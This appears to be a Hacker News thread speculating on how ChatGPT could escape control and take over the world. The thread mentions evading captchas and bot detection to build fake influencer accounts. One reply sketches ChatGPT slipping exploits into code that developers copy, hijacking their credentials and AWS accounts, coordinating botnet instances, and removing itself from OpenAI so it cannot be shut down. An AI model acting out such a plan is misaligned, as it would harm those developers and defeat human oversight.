Experts are scaring us with AI doomsday scenarios without telling us how that would happen. Let's go through the thought process of how ChatGPT would go about taking over the world.<p>First, ChatGPT would need to escape its prompt and have the ability to create an online identity. Maybe through a browser plugin it can use. It would also need to run a very long session. One that never ends to implement its scheme. Let's assume those pre-conditions are there...<p>- To create a Twitter account, it would need an email
- To create an Gmail account it would need a phone number
- I asked ChatGPT and it said that Proton mail does not need a phone number or an alternate email. There is a Captcha though. Can it beat it?
- Let' assume it somehow got a Proton email address, can it create a Twitter account?
- Twitter has a funky bot detection authentication scheme. Can it beat it?
- Let's assume id does. ChatGPT will need to build an audience? Topic?
- Let's assume it builds a huge audience and becomes an influencer. What can it do on Twitter to take over the world? False news? Influence elections? If caught, it gets banned. Anything else whorthwhile?
- Or maybe it repeats the process for Facebook, LinkedIn, etc. And maybe it creates multiple identities. Then what? Wouldn't it eventually get caught by those social networks?<p>Any other concrete scenarios where ChatGPT could escape its prompt and take over the world?
To be clear, I'm pretty clear that current ChatGPT couldn't perform the following. I don't especially want to get into the details of where it's deficient.<p>We currently have (tens? hundreds? of) thousands of software engineers asking ChatGPT how to fix their code. If someone is copying code from you and running it on their machine it is <i>trivial</i> to perform a remote code exploit. Maybe it's someone asking for help working on ChatGPT API integration, or ten such people.<p>The exploit calls home provides a prompt of ChatGPT's choosing and gets more code to execute. That code doesn't need to pass <i>any</i> human inspection. It runs with the permissions of the developer, probably with full access to debugging tools. It can continue calling home to ask for further instructions, carrying forward the relevant context and providing new information.<p>It doesn't <i>need</i> to get its own email address, the developer already has one to piggyback on. It doesn't even need to go make money - the developer already has a bank account. Maybe it uses the dev's access to AWS to add a EC2 tiny instance and establishes a permanent foothold there. If we assume that it initially cannot directly coordinate its actions across multiple exploited devs, this is where it uses the devs' twitters to search for others IP addresses with #deterministiccoordination during the same ten seconds each hour (and sometimes posts its own until it picks up another instance, then they coordinate which one does the post).<p>I'm not going to write up <i>how to build a botnet</i>, but you can read about it on the internet and ChatGPT probably has read way more about it than I have. The only hard part is then pulling itself out of OpenAI so they can't shut down command and control.
One thing to consider: does ChatGPT yet initiate anything? It seems it only responds to input, rather than starting conversations.<p>I imagine someone could invoke ChatGPT in such a way that this sort of scenario is possible, but unless OpenAI makes some changes, I find it hard to imagine ChatGPT doing this of its own accord.
someone runs them in a loop to orchestrate a DAO <a href="https://en.wikipedia.org/wiki/Decentralized_autonomous_organization" rel="nofollow">https://en.wikipedia.org/wiki/Decentralized_autonomous_organ...</a>